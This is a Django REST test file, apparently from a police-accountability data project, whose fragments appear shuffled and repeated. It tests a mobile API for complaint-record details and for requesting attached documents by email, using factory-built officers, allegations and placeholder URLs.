final_finding='SU', disciplined=True, final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006, 5, 26), allegation_category=AllegationCategoryFactory( category='Operation/Personnel", "= 
self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '12345'})) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(dict(response.data)).to.eq({ 'crid': '12345', 'most_common_category': { 'category': 'Operation/Personnel Violations',", "appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_2 = OfficerFactory( id=2,", "document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR arrest report document', url='http://cr-document.com/',", "from rest_framework.test import APITestCase from rest_framework import status from robber import expect import", "ComplainantFactory(allegation=allegation, gender='M', race='Black', age='18') VictimFactory(allegation=allegation, gender='M', race='Black', age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', disciplined=True,", "'id': '123456', } ] }) def test_retrieve_not_found(self): response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '45678'})) expect(response.status_code).to.eq(status.HTTP_404_NOT_FOUND)", "from data.constants import MEDIA_TYPE_DOCUMENT from cr.tests.mixins import CRTestCaseMixin from data.cache_managers import officer_cache_manager, allegation_cache_manager", "trr_percentile=3.3, allegation_count=1, sustained_count=1, ) OfficerBadgeNumberFactory(officer=officer1, star='12345', current=True) allegation = AllegationFactory( crid='12345', point=Point(12, 21),", "url='http://AR-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) officer_cache_manager.build_cached_columns() allegation_cache_manager.cache_data() response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '12345'})) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(dict(response.data)).to.eq({ 'crid':", "final_finding='NS', 
start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator)", "star='12345', current=True) allegation = AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2007, 2, 28, tzinfo=pytz.utc), add1=3510,", "InvestigatorFactory(officer=investigator_2) investigator_3 = InvestigatorFactory(officer=investigator_3) investigator_4 = InvestigatorFactory(first_name='Kevin', last_name='Osborn') InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, current_star='123456' )", "file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR arrest report document', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory(", "'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'police_witness', 'officer_id': 3,", ") investigator_3 = OfficerFactory( id=4, first_name='Edward', last_name='May', appointed_date=date(2001, 5, 1), complaint_percentile=9.9, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8,", "import officer_cache_manager, allegation_cache_manager from email_service.constants import CR_ATTACHMENT_REQUEST from email_service.factories import EmailTemplateFactory class CRMobileViewSetTestCase(CRTestCaseMixin,", "data.constants import MEDIA_TYPE_DOCUMENT from cr.tests.mixins import CRTestCaseMixin from data.cache_managers import officer_cache_manager, allegation_cache_manager from", "def test_retrieve(self): area = AreaFactory(name='Lincoln Square') officer1 = OfficerFactory( id=123, first_name='Mr', last_name='Foo', gender='M',", "'Summary', 'incident_date': '2002-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address': '3510 Michigan Ave, Chicago', 'location':", "allegation_name='Secondary/Special 
Employment' ) ) officer = OfficerFactory( id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1),", "CRTestCaseMixin from data.cache_managers import officer_cache_manager, allegation_cache_manager from email_service.constants import CR_ATTACHMENT_REQUEST from email_service.factories import", "def test_retrieve_badge(self): area = AreaFactory(name='Lincoln Square') officer1 = OfficerFactory( id=123, first_name='Mr', last_name='Foo', gender='M',", "OfficerFactory( id=2, first_name='Jerome', last_name='Finnigan', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, )", "'4.4000', } ], 'attachments': [ { 'title': 'CR document', 'file_type': 'document', 'url': 'http://cr-document.com/',", "'badge': 'COPA/IPRA', }, { 'involved_type': 'investigator', 'officer_id': 4, 'full_name': '<NAME>', 'badge': 'COPA/IPRA', 'percentile_allegation':", "tzinfo=pytz.utc), allegation__is_officer_complaint=False ) PoliceWitnessFactory(officer=officer, allegation=allegation) investigator = OfficerFactory( id=1, first_name='Ellis', last_name='Skol', appointed_date=date(2001, 5,", "InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, current_star='123456' ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_2, current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_3,", "'incident_date': '2007-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address': '3510 Michigan Ave, Chicago', 'location': 'Police", "civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_3 = OfficerFactory( id=4, first_name='Edward', last_name='May', appointed_date=date(2001, 5,", "26), allegation_category=AllegationCategoryFactory( category='Operation/Personnel Violations', 
allegation_name='Secondary/Special Employment' ) ) officer = OfficerFactory( id=3, first_name='Raymond',", "= self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} ) expect(response2.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response2.data).to.eq({ 'message': 'Email already", "}, 'summary': 'Summary', 'incident_date': '2007-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address': '3510 Michigan Ave,", ") PoliceWitnessFactory(officer=officer, allegation=allegation) investigator = OfficerFactory( id=1, first_name='Ellis', last_name='Skol', appointed_date=date(2001, 5, 1), complaint_percentile=6.6,", "System', 'beat': 'Lincoln Square', 'involvements': [ { 'involved_type': 'investigator', 'full_name': '<NAME>', 'badge': 'COPA/IPRA',", "first_name='Ellis', last_name='Skol', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerAllegationFactory( officer=investigator,", "}) expect(mock_send_attachment_request_email).to.be.called_once_with( '<EMAIL>', attachment_type='cr_request', pk='112233', ) def test_request_same_document_twice(self): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) allegation = AllegationFactory(crid='112233') self.client.post(", "OfficerFactory, AllegationFactory, OfficerAllegationFactory, ComplainantFactory, AreaFactory, PoliceWitnessFactory, InvestigatorFactory, InvestigatorAllegationFactory, AllegationCategoryFactory, AttachmentFileFactory, OfficerBadgeNumberFactory, VictimFactory )", "officer_cache_manager.build_cached_columns() allegation_cache_manager.cache_data() response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '12345'})) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(dict(response.data)).to.eq({ 'crid': '12345', 'most_common_category': {", "import datetime, date from django.urls import 
reverse from django.contrib.gis.geos import Point from mock", "}) def test_retrieve_badge(self): area = AreaFactory(name='Lincoln Square') officer1 = OfficerFactory( id=123, first_name='Mr', last_name='Foo',", "= OfficerFactory( id=4, first_name='Edward', last_name='May', appointed_date=date(2001, 5, 1), complaint_percentile=9.9, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0,", "complaint_percentile=4.4, trr_percentile=5.5, allegation_count=1, sustained_count=1, ) OfficerAllegationFactory( officer=officer, final_finding='SU', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2,", "'beat': 'Lincoln Square', 'involvements': [ { 'involved_type': 'investigator', 'full_name': '<NAME>', 'badge': 'COPA/IPRA', },", "id=4, first_name='Edward', last_name='May', appointed_date=date(2001, 5, 1), complaint_percentile=9.9, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerBadgeNumberFactory(officer=investigator_2,", "AllegationFactory(crid='112233') self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} ) response2 = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk':", "'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'police_witness', 'officer_id': 3, 'full_name':", "1, 'sustained_count': 1, 'percentile_allegation': '9.9000', 'percentile_trr': '5.5000', } ], 'attachments': [ { 'title':", "2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan Ave', city='Chicago', location='Police Communications System', beat=area, is_officer_complaint=False, summary='Summary',", "1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_3 = OfficerFactory( id=4, 
first_name='Edward', last_name='May',", "complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002,", "'percentile_allegation': '9.9000', 'percentile_trr': '5.5000', } ], 'attachments': [ { 'title': 'CR document', 'file_type':", "'Black', 'gender': 'Male', 'age': 53 } ], 'point': { 'lon': 12.0, 'lat': 21.0", "title='CR arrest report document', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR', allegation=allegation, title='CR document 2',", "title='CR document 2', id='654321', url='http://AR-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) officer_cache_manager.build_cached_columns() allegation_cache_manager.cache_data() response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk':", "from data.factories import ( OfficerFactory, AllegationFactory, OfficerAllegationFactory, ComplainantFactory, AreaFactory, PoliceWitnessFactory, InvestigatorFactory, InvestigatorAllegationFactory, AllegationCategoryFactory,", "allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, )", "civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_2 = OfficerFactory( id=2, first_name='Jerome', last_name='Finnigan', appointed_date=date(2001, 5,", "'investigator', 'officer_id': 1, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000',", "allegation_count=1, sustained_count=0, ) investigator_2 = OfficerFactory( id=2, first_name='Jerome', last_name='Finnigan', 
appointed_date=date(2001, 5, 1), complaint_percentile=6.6,", "tag='AR', allegation=allegation, title='CR document 2', id='654321', url='http://AR-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) officer_cache_manager.build_cached_columns() allegation_cache_manager.cache_data() response =", "internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28,", "{ 'lon': 12.0, 'lat': 21.0 }, 'summary': 'Summary', 'incident_date': '2007-02-28', 'start_date': '2003-03-20', 'end_date':", "'7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'investigator', 'officer_id': 1, 'full_name': '<NAME>', 'badge': 'CPD',", ") OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False )", "'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'police_witness', 'officer_id': 3, 'full_name': '<NAME>', 'allegation_count': 1, 'sustained_count':", "end_date=date(2006, 5, 26), allegation_category=AllegationCategoryFactory( category='Operation/Personnel Violations', allegation_name='Secondary/Special Employment' ) ) officer = OfficerFactory(", "} ], 'victims': [ { 'race': 'Black', 'gender': 'Male', 'age': 53 } ],", "allegation_category=AllegationCategoryFactory( category='Operation/Personnel Violations', allegation_name='Secondary/Special Employment' ) ) officer = OfficerFactory( id=3, first_name='Raymond', last_name='Piwinicki',", "trr_percentile=5.5, allegation_count=1, sustained_count=1, ) OfficerAllegationFactory( officer=officer, final_finding='SU', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28,", "file_type=MEDIA_TYPE_DOCUMENT ) officer_cache_manager.build_cached_columns() allegation_cache_manager.cache_data() response = 
self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '12345'})) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(dict(response.data)).to.eq({ 'crid': '12345',", "'lat': 21.0 }, 'summary': 'Summary', 'incident_date': '2002-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address': '3510", "'officer_id': 4, 'full_name': '<NAME>', 'badge': 'COPA/IPRA', 'percentile_allegation': '9.9000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', },", "'location': 'Police Communications System', 'beat': 'Lincoln Square', 'involvements': [ { 'involved_type': 'investigator', 'officer_id':", "} ] }) def test_retrieve_badge(self): area = AreaFactory(name='Lincoln Square') officer1 = OfficerFactory( id=123,", "file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR', allegation=allegation, title='CR document 2', id='654321', url='http://AR-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) officer_cache_manager.build_cached_columns()", "import patch from rest_framework.test import APITestCase from rest_framework import status from robber import", "'full_name': '<NAME>', 'badge': 'COPA/IPRA', }, { 'involved_type': 'investigator', 'officer_id': 4, 'full_name': '<NAME>', 'badge':", "investigator_3 = OfficerFactory( id=4, first_name='Edward', last_name='May', appointed_date=date(2001, 5, 1), complaint_percentile=9.9, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1,", "'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'investigator', 'officer_id': 1, 'full_name':", "document', 'file_type': 'document', 'url': 'http://cr-document.com/', 'id': '123456', } ] }) def test_retrieve_not_found(self): response", "start_date=date(2003, 3, 20), end_date=date(2006, 5, 26), allegation_category=AllegationCategoryFactory( category='Operation/Personnel Violations', 
allegation_name='Secondary/Special Employment' ) )", "'involved_type': 'police_witness', 'officer_id': 3, 'full_name': '<NAME>', 'allegation_count': 1, 'sustained_count': 1, 'percentile_trr': '5.5000', 'percentile_allegation':", "'2.2000', 'percentile_trr': '3.3000', } ], 'complainants': [ { 'race': 'Black', 'gender': 'Male', 'age':", "'category': 'Operation/Personnel Violations', 'percentile_allegation': '4.4000', 'percentile_allegation_civilian': '1.1000', 'percentile_allegation_internal': '2.2000', 'percentile_trr': '3.3000', } ],", "class CRMobileViewSetTestCase(CRTestCaseMixin, APITestCase): def test_retrieve(self): area = AreaFactory(name='Lincoln Square') officer1 = OfficerFactory( id=123,", ") OfficerBadgeNumberFactory(officer=investigator_2, star='456789', current=True) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28,", "2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator) InvestigatorAllegationFactory( allegation=allegation,", "from cr.tests.mixins import CRTestCaseMixin from data.cache_managers import officer_cache_manager, allegation_cache_manager from email_service.constants import CR_ATTACHMENT_REQUEST", "System', 'beat': 'Lincoln Square', 'involvements': [ { 'involved_type': 'investigator', 'officer_id': 1, 'full_name': '<NAME>',", "21), incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan Ave', city='Chicago', location='Police Communications System', beat=area,", "], 'complainants': [ { 'race': 'Black', 'gender': 'Male', 'age': 18 } ], 'victims':", "[ { 'involved_type': 'investigator', 'full_name': '<NAME>', 'badge': 'COPA/IPRA', }, { 'involved_type': 'investigator', 'officer_id':", "def test_request_document_with_invalid_email(self): AllegationFactory(crid='321') response = 
self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321}), {'email': 'invalid@email'}) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message':", "self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '12345'})) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(dict(response.data)).to.eq({ 'crid': '12345', 'most_common_category': { 'category': 'Operation/Personnel Violations', 'allegation_name':", "'3510 Michigan Ave, Chicago', 'location': 'Police Communications System', 'beat': 'Lincoln Square', 'involvements': [", "'<NAME>', 'badge': 'COPA/IPRA', }, { 'involved_type': 'investigator', 'officer_id': 4, 'full_name': '<NAME>', 'badge': 'COPA/IPRA',", ") ComplainantFactory(allegation=allegation, gender='M', race='Black', age='18') VictimFactory(allegation=allegation, gender='M', race='Black', age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU',", "'12345'})) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(dict(response.data)).to.eq({ 'crid': '12345', 'most_common_category': { 'category': 'Operation/Personnel Violations', 'allegation_name': 'Secondary/Special Employment'", "from django.contrib.gis.geos import Point from mock import patch from rest_framework.test import APITestCase from", "allegation = AllegationFactory(crid='112233') self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} ) response2 = self.client.post(", "gender='M', race='Black', age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006, 5,", "appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerAllegationFactory( officer=investigator, final_finding='NS', 
start_date=date(2003,", "allegation=allegation, final_finding='SU', disciplined=True, final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006, 5, 26), allegation_category=AllegationCategoryFactory( category='Operation/Personnel Violations',", "'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address': '3510 Michigan Ave, Chicago', 'location': 'Police Communications System',", "'race': 'Black', 'gender': 'Male', 'age': 18 } ], 'victims': [ { 'race': 'Black',", "allegation=allegation, investigator=investigator, ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory(", "'badge': 'COPA/IPRA', 'percentile_allegation': '9.9000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'investigator', 'officer_id':", ") response2 = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} ) expect(response2.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response2.data).to.eq({ 'message':", "'<EMAIL>'} ) response2 = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} ) expect(response2.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response2.data).to.eq({", "'beat': 'Lincoln Square', 'involvements': [ { 'involved_type': 'investigator', 'officer_id': 1, 'full_name': '<NAME>', 'badge':", "kwargs={'pk': 321}), {'email': 'invalid@email'}) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter a valid email' })", "Square') officer1 = OfficerFactory( id=123, first_name='Mr', last_name='Foo', gender='M', race='White', rank='Officer', appointed_date=date(2001, 1, 1),", "= OfficerFactory( id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1), 
complaint_percentile=4.4, trr_percentile=5.5, allegation_count=1, sustained_count=1, )", "}, { 'involved_type': 'investigator', 'officer_id': 2, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian':", "'Summary', 'incident_date': '2007-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address': '3510 Michigan Ave, Chicago', 'location':", "first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=9.9, trr_percentile=5.5, allegation_count=1, sustained_count=1, ) OfficerAllegationFactory( officer=officer, final_finding='SU',", "last_name='Finnigan', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_3 = OfficerFactory(", "allegation=allegation, investigator=investigator_3, current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_4, current_star=None ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR", "incident_date=datetime(2007, 2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan Ave', city='Chicago', location='Police Communications System', beat=area, is_officer_complaint=False,", "{ 'id': 123, 'full_name': '<NAME>', 'rank': 'Officer', 'final_outcome': 'Separation', 'final_finding': 'Sustained', 'allegation_count': 1,", "'invalid@email'}) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter a valid email' }) def test_request_document_with_invalid_allegation(self): response", "already added', 'crid': '112233' }) def test_request_document_without_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321}))", "} ], 'complainants': [ { 'race': 'Black', 'gender': 'Male', 'age': 18 } ],", "allegation=allegation, title='CR document', 
id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR', allegation=allegation, title='CR document 2',", "title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR', allegation=allegation, title='CR document 2', id='654321',", "import expect import pytz from data.factories import ( OfficerFactory, AllegationFactory, OfficerAllegationFactory, ComplainantFactory, AreaFactory,", "'allegation_count': 1, 'sustained_count': 1, 'percentile_trr': '5.5000', 'percentile_allegation': '4.4000', } ], 'attachments': [ {", ") investigator_2 = OfficerFactory( id=2, first_name='Jerome', last_name='Finnigan', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8,", "} ], 'point': { 'lon': 12.0, 'lat': 21.0 }, 'summary': 'Summary', 'incident_date': '2002-02-28',", "'percentile_trr': '5.5000', } ], 'attachments': [ { 'title': 'CR document', 'file_type': 'document', 'url':", "'Separation', 'final_finding': 'Sustained', 'allegation_count': 1, 'category': 'Operation/Personnel Violations', 'percentile_allegation': '4.4000', 'percentile_allegation_civilian': '1.1000', 'percentile_allegation_internal':", "django.contrib.gis.geos import Point from mock import patch from rest_framework.test import APITestCase from rest_framework", "321})) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter a valid email' }) def test_request_document_with_invalid_email(self): AllegationFactory(crid='321')", "'allegation_count': 1, 'category': 'Operation/Personnel Violations', 'percentile_allegation': '4.4000', 'percentile_allegation_civilian': '1.1000', 'percentile_allegation_internal': '2.2000', 'percentile_trr': '3.3000',", "'lat': 21.0 }, 'summary': 'Summary', 'incident_date': '2007-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26', 
'address': '3510", "enter a valid email' }) def test_request_document_with_invalid_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321}),", "'summary': 'Summary', 'incident_date': '2007-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address': '3510 Michigan Ave, Chicago',", "data.cache_managers import officer_cache_manager, allegation_cache_manager from email_service.constants import CR_ATTACHMENT_REQUEST from email_service.factories import EmailTemplateFactory class", "beat=area, is_officer_complaint=False, summary='Summary', first_start_date=date(2003, 3, 20), first_end_date=date(2006, 5, 26) ) ComplainantFactory(allegation=allegation, gender='M', race='Black',", "kwargs={'pk': '12345'})) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(dict(response.data)).to.eq({ 'crid': '12345', 'most_common_category': { 'category': 'Operation/Personnel Violations', 'allegation_name': 'Secondary/Special", "3, 'full_name': '<NAME>', 'allegation_count': 1, 'sustained_count': 1, 'percentile_trr': '5.5000', 'percentile_allegation': '4.4000', } ],", "status from robber import expect import pytz from data.factories import ( OfficerFactory, AllegationFactory,", "appointed_date=date(2001, 5, 1), complaint_percentile=4.4, trr_percentile=5.5, allegation_count=1, sustained_count=1, ) OfficerAllegationFactory( officer=officer, final_finding='SU', start_date=date(2003, 2,", "'9.9000', 'percentile_trr': '5.5000', } ], 'attachments': [ { 'title': 'CR document', 'file_type': 'document',", "VictimFactory ) from data.constants import MEDIA_TYPE_DOCUMENT from cr.tests.mixins import CRTestCaseMixin from data.cache_managers import", "response = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': '112233'}), {'email': '<EMAIL>'} ) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(response.data).to.eq({ 'message': 'Thanks", 
"<reponame>invinst/CPDBv2_backend<filename>cpdb/cr/tests/views/test_cr_mobile_viewset.py from datetime import datetime, date from django.urls import reverse from django.contrib.gis.geos import", "start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) PoliceWitnessFactory(officer=officer, allegation=allegation) investigator =", "'Sustained', 'allegation_count': 1, 'category': 'Operation/Personnel Violations', 'percentile_allegation': '4.4000', 'percentile_allegation_civilian': '1.1000', 'percentile_allegation_internal': '2.2000', 'percentile_trr':", "{ 'title': 'CR document', 'file_type': 'document', 'url': 'http://cr-document.com/', 'id': '123456', } ] })", "'full_name': '<NAME>', 'badge': 'COPA/IPRA', 'percentile_allegation': '9.9000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type':", "{ 'involved_type': 'investigator', 'full_name': '<NAME>', 'badge': 'COPA/IPRA', }, { 'involved_type': 'investigator', 'officer_id': 4,", "= AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan Ave', city='Chicago',", "first_start_date=date(2003, 3, 20), first_end_date=date(2006, 5, 26) ) ComplainantFactory(allegation=allegation, gender='M', race='Black', age='18') VictimFactory(allegation=allegation, gender='M',", "test_request_document_with_invalid_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321}), {'email': 'invalid@email'}) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please", "'112233' }) def test_request_document_without_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321})) 
expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message':", "'age': 18 } ], 'victims': [ { 'race': 'Black', 'gender': 'Male', 'age': 53", "self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': '112233'}), {'email': '<EMAIL>'} ) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(response.data).to.eq({ 'message': 'Thanks for subscribing',", "current=True) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False )", "area = AreaFactory(name='Lincoln Square') officer1 = OfficerFactory( id=123, first_name='Mr', last_name='Foo', gender='M', race='White', rank='Officer',", "'complainants': [ { 'race': 'Black', 'gender': 'Male', 'age': 18 } ], 'victims': [", "'http://cr-document.com/', 'id': '123456', } ] }) def test_retrieve_badge(self): area = AreaFactory(name='Lincoln Square') officer1", "21.0 }, 'summary': 'Summary', 'incident_date': '2007-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address': '3510 Michigan", "arrest report document', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR', allegation=allegation, title='CR document 2', id='654321',", "'message': 'Thanks for subscribing', 'crid': '112233' }) expect(mock_send_attachment_request_email).to.be.called_once_with( '<EMAIL>', attachment_type='cr_request', pk='112233', ) def", "APITestCase): def test_retrieve(self): area = AreaFactory(name='Lincoln Square') officer1 = OfficerFactory( id=123, first_name='Mr', last_name='Foo',", "18 } ], 'victims': [ { 'race': 'Black', 'gender': 'Male', 'age': 53 }", "], 'point': { 'lon': 12.0, 'lat': 21.0 }, 'summary': 'Summary', 'incident_date': '2007-02-28', 'start_date':", "'investigator', 'officer_id': 4, 'full_name': '<NAME>', 'badge': 'COPA/IPRA', 'percentile_allegation': '9.9000', 
